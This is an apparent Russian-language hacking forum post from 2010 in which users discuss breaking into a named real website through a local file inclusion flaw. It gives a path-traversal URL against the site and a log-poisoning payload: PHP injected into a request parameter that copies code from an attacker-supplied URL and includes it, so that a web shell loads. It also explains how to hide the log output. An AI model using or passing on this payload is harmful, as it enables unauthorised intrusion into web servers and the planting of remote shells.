20.05.2010, 20:55
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от 547
чето уже негрузится 
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?
и что это ты понаписал StSigX15981???????
и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал
ты присвоил глобальной переменной aa сайт маднета
и проинклудил его... прикольно, но очень паливно StSigX15981 - это для визуализации в логах того, что запрос нормально записался
да, шел грузился вместе с логами
паливно да, но это я на скорую руку сделал, по умному надо было бы так:
http://www.aiesec-berlin.de/KDK/index.php?load=<?php if ($_GET[cxc]=1){ob_clean();copy($_GET[axa],$_GET[bxb]);include($_GET[bxb]);}; ?>
ob_clean() или ob_end_clean() - попытка очистить все, что было выведено до начала шела - т.е. чтоб грузился только шел, без этих мегабайтов лога. проверить не успел
|
|
|